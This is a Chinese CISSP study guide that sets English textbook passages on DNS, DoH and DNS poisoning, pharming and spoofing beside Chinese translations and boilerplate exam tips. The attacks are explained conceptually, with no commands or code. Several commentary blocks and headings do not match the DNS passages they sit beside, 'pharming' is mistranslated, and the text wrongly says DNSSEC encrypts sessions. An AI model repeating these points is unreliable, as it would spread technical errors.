这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 738 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 21 / PDF P739

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

unreliable. UDP has very low overhead and thus can transmit data quickly. However, UDP should be used only when the delivery of data is not essential. UDP is often employed by real-time or streaming communications for audio and/or video. Domain Name System There are three numbering and addressing concepts you should be familiar with: Domain Name The domain name or computer name is a “temporary” human-friendly convention assigned to an IP address. IP Address The IP address is a “temporary” logical address assigned over or onto the MAC address. MAC Address The MAC address, or hardware address, is a “permanent” physical address.

“Permanent” and “Temporary” Addresses The reason these two adjectives are within quotation marks is that they are not completely accurate. MAC addresses are designed to be permanent physical addresses but often can be changed. When the NIC supports the change, the change occurs on the hardware. When the OS supports the change, the change is only in memory, but it looks like a hardware change to all other network entities (this is known as MAC spoofing or MAC cloning if duplicating another device's MAC address). An IP address is temporary because it is a logical address and can be changed at any time, either by DHCP or by an administrator.

However, there are instances where systems are statically assigned an IP address. Likewise, computer names or DNS names might appear permanent, but they are logical and thus able to be modified by an administrator. Domain Name System (DNS) resolves a human-friendly domain name into its IP address equivalent. Then, Address Resolution Protocol (ARP) (see the later section “ARP Concerns”) resolves the IP address into its MAC address equivalent. It is also possible to resolve an IP address into a domain name via a DNS reverse lookup if a PTR (i.e., pointer) resource record is defined in the

中文直译 / 整理

不可靠的。 UDP开销极低,因此可以快速传输数据。 然而,只有在数据传输非 必需时才应使用UDP。 UDP常用于音频和/或视频的实时或流媒体通信。 域名系统 您应熟悉以下三种编号和寻址概念: 域名 域名或计算机名是分配给IP地址的“临时”人性化约定。 IP地址 IP地址是分配在MAC地址之上或之上的“临时”逻辑地址。 MAC地址 MAC地址或硬件地址是“永久”的物理地址。 “永久”和“临时”地址 这两个形容词加上引号的原因是它们并不完全准确。 MAC地址本应是永 久性的物理地址,但通常可以被更改。 当网卡支持更改时,更改发生在 硬件层面; 当操作系统支持更改时,更改仅存在于内存中,但对所有其 他网络实体而言,它看起来就像硬件更改一样(这被称为MAC欺骗或 MAC克隆,如果复制了另一设备的MAC地址的话)。 IP地址是临时的,因为它是逻辑地址,可以随时通过DHCP或管理员更改。 然而,有时系统会被静态分配一个IP地址。 同样,计算机名称或DNS名 称可能看似永久,但它们是逻辑的,因此可以由管理员修改。 域名系统(DNS)将人类友好的域名解析为其对应的IP地址。

然后,地址解析 协议(ARP)(参见后文“ARP注意事项”部分)将IP地址解析为其对应的 MAC地址。 如果在

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 22 / PDF P740

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

domain's zone file. IP addresses are assigned either statically, or dynamically via DHCP. DNS is the hierarchical naming scheme used in both public and private networks. DNS links IP addresses and human-friendly fully qualified domain names (FQDNs) together. An FQDN consists of three main parts: Top-level domain (TLD)—The com in www.google.com Registered domain name—The google in www.google.com Subdomain(s) or hostname—The www in www.google.com The TLD can be any number of official options, including six of the original seven TLDs—com, org, edu, mil, gov, and net—as well as many newer ones, such as info, museum, telephone, mobi, biz, and so on.

There are also twoletter country variations known as country codes. (See www.iana.org/domains/root/db for details on current TLDs and country codes.) The seventh original TLD was int, for international, which was replaced by the two-letter country codes. The registered domain name must be officially registered with one of any number of approved domain registrars, such as Network Solutions (http://networksolutions.com), Domains.com, or IONOS (http://ionos.com). The far-left section of an FQDN can be either a single hostname, such as www., ftp., blog., images., and so on, or a multi-sectioned subdomain designation, such as server1.group3.bldg5.myexamplecompany.com.

The total length of an FQDN can't exceed 253 characters (including the dots). Any single section can't exceed 63 characters. FQDNs can only contain letters, numbers, hyphens, and periods. Though not typically shown, there is a dot to the right of the TLD, which represents the root of the entire DNS namespace. Every registered domain name has an assigned authoritative name server. The primary authoritative name server hosts the original editable zone file for the domain. Secondary authoritative name servers can be used to host read-only copies of the zone file. A zone file is the collection of resource records or details about the specific domain.

There are dozens of possible resource records (see www.iana.org/assignments/dns-parameters/dnsparameters.xhtml), such as A records linking an FQDN to an IPv4 address and AAAA records linking an FQDN to an IPv6 address. The use of AAAA is sometimes referred to as DNSv6.

中文直译 / 整理

域名的区域文件中定义了PTR(即指针)资源记录,则也可以通过DNS反向查找将IP地址解 析为域名。 IP地址可以静态分配,也可以通过DHCP动态分配。 DNS 是用于公共和私有网络的分层命名方案。 DNS 将 IP 地址与人类友好的 完全合格域名(FQDN) 关联起来。 一个 FQDN 由三个主要部分组成: 顶级域名(TLD)—com 是 www.google.com 中的部分 注册域名—google 是 www.google.com 中的部分 子域名或主机名—www 是 www.google.com 中的部分 顶级域名可以是任何数量的官方选项,包括原始七个顶级域名中的六个—com、org、 edu、mil、gov 和 net—以及许多新的顶级域名,例如 info、museum、telephone、 mobi、biz 等。 此外,还有被称为 国家代码 的两位字母国家变体。 (参见 www.iana.org/domains/root/db 了解当前顶级域名和国家代码的详细信息。 ) 原始的第七个顶级域名是 int,代表国际,后被两位字母的国家代码取代。

注册的域名必须通过任意数量的经批准的域名注册商之一进行正式注册,例如 Network Solutions (http://networksolutions.com)、Domains.com 或 IONOS (http://ionos.com)。 FQDN 最左侧的部分可以是单个主机名,例如 www.、ftp.、blog.、images.,等等, 或者是一个多级子域名称,例如 server1.group3.bldg5.myexamplecompany.com。 FQDN 的总长度不能超过 253 个字符(包括点号)。 任何单个部分都不能超过 63 个字符。 FQDN 只能包含字母、数字、连字符和点号。 虽然通常不显示,但 在顶级域名右侧还有一个点,代表整个 DNS 命名空间的根。 每个注册的域名都有一个指定的权威名称服务器。 主权威名称服务器 托管该域的原始可编辑区域文件。 辅助权威名称服务器 可用于托管区域文件的只读副本。 区域文件 是关于特定域的 资源记录 的集 合。

可能存在数十种资源记录(参见 www.iana.org/assignments/dns-parameters/dns-parameters.xhtml),例如 A 记录将 FQDN 链接到 IPv4 地址,AAAA 记录将 FQDN 链接到 IPv6 地址。 AAAA 的使用有时被称为 DNSv6。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

分层:分层把控制按层排列,让攻击者必须连续突破。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
分层 分层把控制按层排列,让攻击者必须连续突破。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 23 / PDF P741

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

Some of the more commonly used resource records are: A: Address record; links a FQDN to an IPv4 address AAAA: Address record; links a FQDN to an IPv6 address PTR: Pointer record; links an IPv4 or IPv6 address to a FQDN CNAME: Canonical name or alias record; links a FQDN to another FQDN MX: Mail exchange record; identifies SMTP email servers for a domain NS: Name server record; identifies the DNS servers for a domain SOA: Start of authority record; identifies the primary authoritative DNS server, the responsible email address, serial number (of the zone file), and time intervals of refresh, retry, expire, and default TTL Originally, DNS was handled by a static local file known as the hosts file.

The hosts file contains hard-coded references for domain names and their associated IP addresses. This file still exists on most TCP/IP capable computers, but a dynamic DNS query system has mostly replaced it. Administrators or threat actors can add content to the hosts file. When client software points to an FQDN, the resolution process first checks the local DNS cache to see whether the answer is already known. The DNS cache consists of the preloaded local hosts file plus any DNS query results (that haven't timed out). If the needed answer isn't in the cache, a DNS query is sent to the DNS server indicated in the local IP configuration. DNS operates over TCP and UDP port 53.

TCP port 53 is used for zone transfers. These are zone file exchanges between DNS servers, for special manual queries, or when a response exceeds 512 bytes. UDP port 53 is used for most typical DNS queries. Domain Name System Security Extensions (DNSSEC) (http://dnssec.net) is a security improvement to the existing DNS infrastructure. The primary function of DNSSEC is to provide mutual certificate authentication and encrypted sessions between devices during DNS operations. DNSSEC has been implemented across a significant portion of the DNS system. Once fully implemented, DNSSEC will significantly reduce server-focused DNS abuses, such as zone file poisoning and DNS cache poisoning.

However, DNSSEC only applies to DNS servers, not to systems performing queries against DNS servers (such as clients).

中文直译 / 整理

一些更常用的资源记录包括: A:地址记录; 将FQDN链接到IPv4地址 AAAA:地址记录; 将FQDN链接到IPv6地址 PTR:指针记录; 将IPv4或IPv6地址链接到FQDN CNAME:规范名称或别名记录; 将FQDN链接到另一个FQDN MX:邮件交换记录; 标识域的SMTP邮件服务器 NS:名称服务器记录; 标识域的DNS服务器 SOA:授权开始记录; 标识主权威DNS服务器、负 责的电子邮件地址、区域文件的序列号,以及刷新、重试、过期和默认 TTL的时间间隔 最初,DNS由一个称为hosts的静态本地文件处理。 hosts文件包含域名及其关 联IP地址的硬编码引用。 该文件仍存在于大多数支持TCP/IP的计算机上,但动 态DNS查询系统已基本取代了它。 管理员或威胁行为者可以向hosts文件添加 内容。 当客户端软件指向一个FQDN时,解析过程首先检查本地DNS缓存,以确定答 案是否已知。 DNS缓存由预加载的本地hosts文件以及任何未超时的DNS查询 结果组成。 如果所需答案不在缓存中,则会向本地IP配置中指定的DNS服务器 发送DNS查询。 DNS通过TCP和UDP端口53运行。

TCP端口53用于区域传输,这些是DNS 服务器之间的区域文件交换,用于特殊的手动查询,或当响应超过512字节时 使用。 UDP端口53用于大多数典型的DNS查询。 域名系统安全扩展(DNSSEC) (http://dnssec.net) 是对现有 DNS 基础设施 的安全改进。 DNSSEC 的主要功能是在 DNS 操作期间在设备之间提供双向证 书认证和加密会话。 DNSSEC 已在 DNS 系统的很大一部分中得到实施。 一旦 完全实施,DNSSEC 将显著减少以服务器为目标的 DNS 滥用行为,例如区域 文件污染和 DNS 缓存污染。 然而,DNSSEC 仅适用于 DNS 服务器,不适用于 向 DNS 服务器发起查询的系统(例如客户端)。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
学习单元 24 / PDF P742

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Non-DNS servers (i.e., mostly client devices), especially when using the Internet, should consider using DNS over HTTPS (DoH). This system creates an encrypted session with a DNS server of TLS-protected HTTP and then uses that session as a form of VPN to protect the DNS query and response. A late 2020 enhancement to DoH is Oblivious DoH (OdoH). OdoH adds a DNS proxy between the client and the DNS resolver so that the identity of the requesting client is isolated from the DNS resolver. Thus, ODoH provides anonymity and privacy to DNS queries. However, you are now trusting the ODoH provider to protect your privacy.

For an excellent primer and advanced discussion on DNS, its operation, and known issues, please visit “An Illustrated Guide to the Kaminsky DNS Vulnerability”: http://unixwiz.net/techtips/iguidekaminsky-dns-vuln.html. DNS Poisoning DNS poisoning is the act of falsifying the DNS information used by a client to reach a desired system. It can take place in many ways. Whenever a client needs to resolve a DNS name into an IP address, it may go through the following process: 1. Check the local cache (which includes content from the hosts file). 2. Send a DNS query to a known DNS server. 3. Send a broadcast query to any possible local subnet DNS server.

(This step isn't widely supported.) If the client doesn't obtain a DNS-to-IP resolution from any of these steps, the resolution fails and the communication can't be sent. There are many ways to attack or exploit DNS, most of which are used to return false results. Rogue DNS Server A rogue DNS server can listen in on network traffic for any DNS query or specific DNS queries related to a target site. Then the rogue DNS server sends a DNS response to the client with false IP information. Once the client receives the response from the rogue DNS server, the client closes the DNS

中文直译 / 整理

非 DNS 服务器(即主要是客户端设备),特别是在使用互联网时,应考虑使 用 DNSoverHTTPS(DoH)。 该系统通过 TLS 保护的 HTTP 与 DNS 服务器 建立加密会话,然后将该会话用作 VPN 来保护 DNS 查询和响应。 2020 年底 对 DoH 的一项增强是 隐蔽式DoH(OdoH)。 OdoH 在客户端和 DNS 解析 器之间添加了一个 DNS 代理,从而使请求客户端的身份与 DNS 解析器隔离。 因此,ODoH 为 DNS 查询提供了匿名性和隐私性。 但此时您需要信任 ODoH 提供商来保护您的隐私。 有关DNS及其运行机制和已知问题的优秀入门与高级讨论,请参阅《 Kaminsky DNS 漏洞图解指南》: http://unixwiz.net/techtips/iguide-kaminsky-dns-vuln.html。 DNS 毒化 DNS毒化是指伪造客户端用于访问目标系统的DNS信息的行为。 它可以通过多 种方式发生。 当客户端需要将DNS名称解析为IP地址时,可能会经历以下过程: 1. 检查本地缓存(包括hosts文件中的内容)。 2. 向已知的DNS服务器发送DNS查询。

3. 向任何可能的本地子网DNS服务器发送广播查询。 (此步骤未被广泛支持。 ) 如果客户端未能通过这些步骤中的任何一步获得DNS到IP的解析,则解析失败, 通信无法发送。 攻击或利用DNS的方法有很多,其中大多数用于返回虚假结果。 恶意DNS服务器 一个 恶意DNS服务器 可以监听与目标网站相关的任何DNS查询或特定DNS查 询的网络流量。 然后,该恶意DNS服务器向客户端发送包含虚假IP信息的 DNS响应。 一旦客户端收到该恶意DNS服务器的响应,客户端就会关闭DNS

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

指南:指南是建议做法,不一定强制。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

Recommended、not compulsory 常对应 guideline。

IPS 放在线路中,误报可能影响可用性。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
指南 指南是建议做法,不一定强制。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
学习单元 25 / PDF P743

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

query session, which causes the response from the real DNS server to be dropped and ignored as an out-of-session packet. DNS queries are not authenticated, but they do contain a 16-bit value known as the query ID (QID). The DNS response must include the same QID as the query to be accepted. Thus, a rogue DNS server must include the requesting QID in the false reply. Performing DNS Cache Poisoning DNS poisoning involves attacking DNS servers and placing incorrect information into its zone file or cache. Authorized DNS server attacks aim to alter the primary record of an FQDN in the zone file on the primary authoritative DNS server.

This causes real DNS servers to send false data back to clients. However, an attack on an authoritative DNS server typically gets noticed very quickly, so it rarely results in widespread exploitation. So, most attackers focus on caching DNS servers instead. A caching DNS server is any DNS system deployed to cache DNS information from other DNS servers. The content hosted on a caching DNS server is not being watched by the worldwide security community but just the local operators. Thus, an attack against a caching DNS server can potentially occur without notice for a significant period of time. This variation can be called DNS cache poisoning.

Although both of these attacks focus on DNS servers, they ultimately affect clients. Once a client has performed a dynamic DNS resolution, the information received from an authoritative DNS server or a caching DNS server will be temporarily stored in the client's local DNS cache. If that information is false, then the client's DNS cache has been poisoned. DNS Pharming Another attack closely related to DNS poisoning and/or DNS spoofing is DNS pharming. Pharming is the malicious redirection of a valid website's URL or IP address to a fake website. Pharming typically occurs either by modifying the local hosts file on a system or by poisoning or spoofing DNS resolution.

Altering the Hosts File Modifying the hosts file on the client by placing false DNS data into it redirects users to false locations. If an attacker is able to plant false information into the hosts file, then when the system boots, the contents of

中文直译 / 整理

查询会话,导致来自真实DNS服务器的响应被丢弃并视为会话外的数据包。 DNS 查询未经身份验证,但其中包含一个称为 查询ID(QID) 的 16 位值。 DNS 响应必须包含与查询相同的 QID 才能被接受。 因此,恶意 DNS 服务器 必须在虚假回复中包含请求的 QID。 执行 DNS 缓存投毒 DNS 投毒涉及攻击 DNS 服务器,并在其区域文件或缓存中植入错误信息。 授 权 DNS 服务器攻击旨在更改主权威 DNS 服务器上区域文件中的 FQDN 主记 录。 这会导致真实 DNS 服务器向客户端返回虚假数据。 然而,对权威 DNS 服 务器的攻击通常会很快被发现,因此很少导致广泛利用。 因此,大多数攻击者转而针对缓存 DNS 服务器。 缓存 DNS 服务器是指任 何用于缓存其他 DNS 服务器 DNS 信息的 DNS 系统。 缓存 DNS 服务器上托 管的内容未受到全球安全社区的监控,而仅由本地操作员关注。 因此,对缓存 DNS 服务器的攻击可能在相当长的时间内不被察觉。 这种变体可称为 DNS缓 存投毒。 尽管这两种攻击都针对 DNS 服务器,但最终影响的是客户端。

一旦客户端 执行了动态 DNS 解析,从权威 DNS 服务器或缓存 DNS 服务器接收到的信 息将被临时存储在客户端的本地 DNS 缓存中。 如果该信息是虚假的,则客 户端的 DNS 缓存已被污染。 DNS 炼金术 另一种与 DNS 污染和/或 DNS 欺骗密切相关的攻击是 DNS炼金术。 炼金术是 指恶意将有效网站的 URL 或 IP 地址重定向到伪造网站。 炼金术通常通过修改 系统上的本地 hosts 文件,或通过污染或欺骗 DNS 解析来实现。 修改 Hosts 文件 通过在客户端的 hosts 文件中植入虚假的 DNS 数据,可以将用户重定向到虚假位置。 如果攻击者能够将虚假信息植入 hosts 文件,那么当系统启动时,该文件的内容将

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
身份 身份是主体在系统中的标识。
学习单元 26 / PDF P744

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

the hosts file will be read into memory, where they will take precedence. This attack is effective, but it is also highly targeted. It only affects the individual systems with a locally corrupted hosts file. If the attacker wishes to cause harm more broadly, any of the other methods would be more effective. Corrupt the IP Configuration Corrupting the IP configuration can result in a client having a false DNS server definition (i.e., DNS lookup address changing). The DNS server address is typically distributed to clients through DHCP, but it can also be assigned statically. Attacks to alter a client's DNS server lookup address can be performed by compromising DHCP or through a script.

DNS Query Spoofing A DNS query spoofing attack occurs when the threat actor is able to eavesdrop on a client's query to a DNS server. The attacker then sends back a reply with false information. In order for this to be successful, the false reply must include the correct QID cloned from the query. Use Proxy Falsification Although not strictly a DNS issue, a proxy falsification attack could be implemented via DNS if the proxy's domain name has to be resolved by the client to use the proxy. Attacks could modify the local configuration, the configuration script, or the routing table to redirect communications to a false proxy.

This method works only against web communications (or other services or protocols that use a proxy). A rogue proxy server can modify traffic packets to reroute requests to whatever site the malicious actor wants. An adversary in the middle (AitM) (also known as a man-inthe-middle attack [MitM] or on-path attack) can be performed using DNS abuses, such as DNS cache poisoning. Once a client receives a response from DNS, that response will be cached for future use. If false information can be fed into the DNS cache, then misdirecting communications is trivially easy. See Chapter 17, “Preventing and Responding to Incidents,” for more on this type of attack. Defenses to DNS Poisoning

中文直译 / 整理

被读入内存,并优先生效。 这种攻击虽然有效,但针对性极强,仅影响本地 hosts 文件被篡改的单个系统。 如果攻击者希望造成更广泛的影响,其他任何 方法都会更有效。 破坏IP配置 破坏IP配置可能导致客户端获得错误的DNS服务器定义(即DNS查找地址发生 变化)。 DNS服务器地址通常通过DHCP分发给客户端,但也可以静态分配。 通过入侵DHCP或使用脚本,攻击者可以更改客户端的DNS服务器查找地址。 DNS查询欺骗 DNS查询欺骗攻击发生在威胁行为者能够窃听客户端对DNS服务器的查询时。 攻击者随后发送包含虚假信息的回复。 为使此攻击成功,虚假回复必须包含从 查询中克隆的正确QID。 使用代理伪造 尽管这并非严格的DNS问题,但如果客户端需要通过解析代理的域名来使用代 理,则可以通过DNS实施代理伪造攻击。 攻击可能修改本地配置、配置脚本或 路由表,以将通信重定向到虚假代理。 此方法仅对Web通信(或其他使用代理 的服务或协议)有效。 恶意代理服务器可以修改数据包,将请求重定向到攻击 者指定的任何网站。 中间人攻击(AitM)(也称为中间人攻击 [MitM] 或路径攻击)可以 通过DNS滥用实现,例如DNS缓存污染。

一旦客户端收到DNS的响应,该 响应将被缓存以供将来使用。 如果能够向DNS缓存注入虚假信息,则重定 向通信将变得极其简单。 参见第17章,“事件的预防与响应”,了解更多 关于此类攻击的信息。 DNS投毒的防御措施

小白解释

场景先行:你是公司的安全负责人,正在读第 744 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
学习单元 27 / PDF P745

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Organizations should use a split-DNS system (aka split-horizon DNS, splitview DNS, and split-brain DNS). A split-DNS is deploying a DNS server for public use and a separate DNS server for internal use. All data in the zone file on the public DNS server is accessible by the public via queries or probing. However, the internal DNS is for internal use only. Only internal systems are granted access to interact with the internal DNS server. Outsiders are prohibited from accessing the internal DNS server by blocking inbound port 53 for both TCP and UDP.

TCP 53 is used for zone transfers (which includes most DNS server–to–DNS server communications), and UDP 53 is used for queries (which is any non-DNS system sending a query to a DNS server). Internal systems can be configured to interact only with the internal DNS servers, or they may be allowed to send queries to external DNS servers (which does require the firewall to be a stateful inspection firewall configured to allow responses to return to the internal system from an approved outbound query).

